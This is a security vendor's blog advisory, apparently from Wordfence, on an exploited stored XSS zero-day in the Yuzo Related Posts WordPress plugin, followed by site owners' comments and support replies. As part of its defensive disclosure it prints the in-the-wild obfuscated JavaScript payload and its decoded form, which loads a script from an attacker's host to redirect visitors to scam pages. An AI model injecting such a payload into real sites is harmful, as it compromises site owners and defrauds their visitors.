Updates on WordPress security, Wordfence and what we're cooking in the lab today.

Wordfence Blog

Yuzo Related Posts Zero-Day Vulnerability Exploited in the Wild

This entry was posted in Vulnerabilities, WordPress Security on April 10, 2019 by Dan Moen   30 Replies

The Yuzo Related Posts plugin, which is installed on over 60,000 websites, was removed from the WordPress.org plugin directory on March 30, 2019 after an unpatched vulnerability was publicly, and irresponsibly, disclosed by a security researcher that same day. The vulnerability, which allows stored cross-site scripting (XSS), is now being exploited in the wild. These attacks appear to be linked to the same threat actor who targeted the recent Social Warfare and Easy WP SMTP vulnerabilities.

The XSS protection included in the Wordfence firewall protects against the exploit attempts we have seen so far. Both free and Premium Wordfence users are protected against these attacks. Based on a deeper analysis of the security flaws present in the plugin we have also deployed protection against additional attack vectors. Premium customers will receive the update today, free users in 30 days. We recommend that all users remove the plugin from their sites immediately.

is_admin() Strikes Again

The vulnerability in Yuzo Related Posts stems from missing authentication checks in the plugin routines responsible for storing settings in the database. The code below from assets/ilenframework/core.php is the crux of the problem.

function __construct(){

if( ! is_admin() ){ // only front-end

self::set_main_variable();
return;

}elseif( is_admin() ){ // only admin

// set default if not exists
self::_ini_();

Developers often mistakenly use is_admin() to check if a piece of code that requires administrative privileges should be run, but as the WordPress documentation points out, that isn’t how the function should be used. In this scenario self::_ini_() is called on any request to an administrative interface page, including /wp-admin/options-general.php and /wp-admin/admin-post.php, which allows a POST request to those pages to be processed by self::save_options(); later in the code.

The result is that an unauthenticated attacker can inject malicious content, such as a JavaScript payload, into the plugin settings. That payload is then inserted into HTML templates and executed by the web browser when users visit the compromised website. This security issue could be used to deface websites, redirect visitors to unsafe websites, or compromise WordPress administrator accounts, among other things.

Exploits Lead to Malicious Redirects

Today, eleven days after this vulnerability was irresponsibly disclosed and a proof-of-concept (PoC) was published, threat actors have begun exploiting sites with Yuzo Related Posts installed.

Exploits currently seen in the wild inject malicious JavaScript into the yuzo_related_post_css_and_style option value.

</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>

Once deobfuscated, it’s easier to see what the script is doing:

</style><script language=javascript>var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://hellofromhony[.]org/counter';
document.getElementsByTagName('head')[0].appendChild(elem);</script>

When a user visits a compromised website containing the above payload, they will be redirected to malicious tech support scam pages. Example:

Three Vulnerabilities with a Lot in Common

Our analysis shows that the attempts to exploit this vulnerability share a number of commonalities with attacks on two other vulnerabilities discovered in other plugins: Social Warfare and Easy WP SMTP.

Exploits so far have used a malicious script hosted on hellofromhony[.]org, which resolves to 176.123.9[.]53. That same IP address was used in the Social Warfare and Easy WP SMTP campaigns. In addition, all three campaigns involved exploitation of stored XSS injection vulnerabilities and have deployed malicious redirects. We are confident that the tactics, techniques and procedures (TTPs) in all three attacks point to a common threat actor.

Conclusion

As was the case a few weeks ago, the irresponsible actions of a security researcher has resulted in a zero-day plugin vulnerability being exploited in the wild. Cases like this underscore the importance of a layered security approach which includes a WordPress firewall.

Site owners running the Yuzo Related Posts plugin are urged to remove it from their sites immediately, at least until a fix has been published by the author. Wordfence Premium customers and free users have been protected against the current attacks we’re seeing in the wild. An additional firewall rule to protect against alternate exploits has been developed and deployed to our Premium customers today and will be available to free users in 30 days.

Did you enjoy this post? Share it!

30 Comments on "Yuzo Related Posts Zero-Day Vulnerability Exploited in the Wild"

Carin Bosman April 10, 2019 at 1:05 pm

Thanks for keeping us posted!
Something similar happened to me on Monday - it was a different plugin, but the result was the same - i lost my admin privileges, and half my site is currently down...(one of two plugins, i still cant figure out which one, but they were the only two plugins i installed on that day)

Mike Polek April 10, 2019 at 1:48 pm

Given how often the misunderstanding around is_admin() causes problems similar to this, perhaps it's time to rename the function is_admin_page(), or something else which clearly indicates that the function is not related to the privileges of the caller.

Biswajit April 10, 2019 at 2:21 pm

This can be also checked by current_user_can function.

Tran Thao April 10, 2019 at 4:52 pm

My site used it and was redirected all. I must delete it yesterday

Muskie April 11, 2019 at 11:08 am

I too switched to this plugin from YARPP and this morning discovered I could not access my blog. Luckily I was logged in, in another tab and was able to find a WordPress forum thread or two and fix this. But related post plugins seem to be particularly problematic. Supposedly JetPack has this feature now but I'm thinking of just not having this feature on my blog anymore.

HL Carpenter April 10, 2019 at 6:01 pm

Thank you for all you do, Wordfence. Had forgotten this was the plugin on our site because the name on the plugin list didn't include Yuzo. But there it was...and now it's gone.

Martin April 11, 2019 at 1:28 am

Will deactivating the plugin until it is patched protect from the exploit?

Dan Moen April 11, 2019 at 8:27 am

We recommend that you remove it from your site immediately.

Eddie April 11, 2019 at 1:57 am

Thank you for this. I was a victim as well and unfortunately installed Wordfence only after this.

Could this have been prevented if I had Wordfence installed before?

Dan Moen April 11, 2019 at 8:16 am

The Wordfence firewall would have blocked the attacks we're seeing in the wild, yes.

Han April 11, 2019 at 3:36 am

Thanks for the update. Unfortunately on one of my websites Wordfence broke probably due to an update and it was injected by this Yuzo Related Posts attack. Any chance to repair this? Or restore a complete backup?

Kathy Zant April 12, 2019 at 10:10 am

Restoring from a recent backup can definitely get you back on your feet. We also have a security services team that can assist. https://www.wordfence.com/wordfence-site-cleanings/

Tom April 11, 2019 at 5:33 am

I am not a plugin developer, but I use !is_admin() conditionals in functions.php to dequeue scripts/styles which I don't need in the front-end, for example jQuery. Is this usage of !is_admin() safe or not?

Kathy Zant April 12, 2019 at 2:08 pm

This would be fine. Definitely review the WordPress documentation when using any core function.

Sam April 11, 2019 at 11:46 am

Hello,

I installed WordFence and did not have this plugin, yet it happened. I had the latest WordFence installed.

How does this happen?

Thank you for any help. I don't mind paying for the help to make sure it doesn't happen.

Kathy Zant April 12, 2019 at 10:12 am

I'm sorry to hear you're having issues with your site. If you did not have the Yuzo Related Posts plugin installed, it's unlikely that this was what had happened. If you need a security team to take a look at your site and investigate, please check with our Security Services Team. https://www.wordfence.com/wordfence-site-cleanings/

Ederson April 11, 2019 at 12:43 pm

My page was infected, I have Wordfence installed but I do not know what happened. I can not enter the wordpress admin panel because it is redirected to another hellofromhony page.
I would like to know how can we clean our website of this malware?
NOTE: the page that I put in the website field is not the one that is infected.

Thanks in advance for your collaboration.

Kathy Zant April 12, 2019 at 10:31 am

Hi Ederson, I'm sorry to learn your site is redirecting. If you have a recent backup, you could restore from it and remove the Yuzo Related Posts plugin to remove the vulnerability. You may be able to investigate if it's simply a change in your database using PhpMyAdmin if you have that set up in your hosting account. If you need help, our Security Services Team can help. https://www.wordfence.com/wordfence-site-cleanings/ Or you can review this guide for cleaning a hacked site. https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

John April 11, 2019 at 7:36 pm

I noticed an unknown user created on my site with a administrator role attached, could be as a result of this?

Kathy Zant April 12, 2019 at 10:38 am

Hi John, compromising administrator accounts is one method of exploiting the vulnerabilities within Yuzo Related Posts.

Saim Rasheed April 11, 2019 at 11:46 pm

Hello My websote has been hacked and affected Yesterday. When i access to my website it says redirects to [https://]hellofromhony[.]com/go.php?temp=5&/

Also i cant access to my wp login.php

How this happens??? Please Help me

Kathy Zant April 12, 2019 at 10:42 am

Hi Saim, I'm sorry to hear you're having issues. You can restore from a recent backup and remove the Yuzo Related Posts plugin, or follow this guide for cleaning your hacked site. https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ If you need help beyond that, our Security Services Team can assist. https://www.wordfence.com/wordfence-site-cleanings/

Giang Lê Hoàng April 12, 2019 at 9:13 am

Hi,

Is there any way in settings (.htaccess..) that could help us to survive zeo-day attack (like this one or Yellow Pencil)?

Thanks!

Kathy Zant April 12, 2019 at 10:45 am

If you don't have Wordfence Premium with updated firewall rules to protect you, we recommend removing the vulnerable plugins until they have been patched.

Chris April 12, 2019 at 11:26 am

I've spent maybe a total of 24 hours the last three days figuring out why my sites kept being redirected to scam sites. Everytime I restored my site and about 10 hours later the hack returned. Then I accidentally found this page. Thanks a lot! I hope that the hacking of my sites now will stop. Next step -> get the Wordfence Premium!!

Sanusi Abdur Razaq April 13, 2019 at 2:28 am

Thanks for the rare work and updates.

Edwin April 14, 2019 at 9:46 am

Very well, I followed some guides about how to clean it but still I had problems. ,,... until I figured out that I have to clear cash too.

L Chandana April 17, 2019 at 10:31 am

my site was hacked, and redirected ads sites.
It was big problem for me,
after completely removed site, then restore from backup.
now site on, but I didn't know reason is this plugin
after few days i found this articles.

same thing happen to my site, described on this article

Carolynne April 21, 2019 at 9:06 am

Does anyone know of an alternative to this related posts plugin?

Kathy Zant April 22, 2019 at 1:35 pm

There are quite a few related posts plugins available in the repository: https://wordpress.org/plugins/search/related+posts/

Follow Us

      


Protect your websites with the #1 WordPress Security Plugin

Get Premium
Over 100 million downloads

Wordfence Newsletter

Get WordPress Security Alerts and Product Updates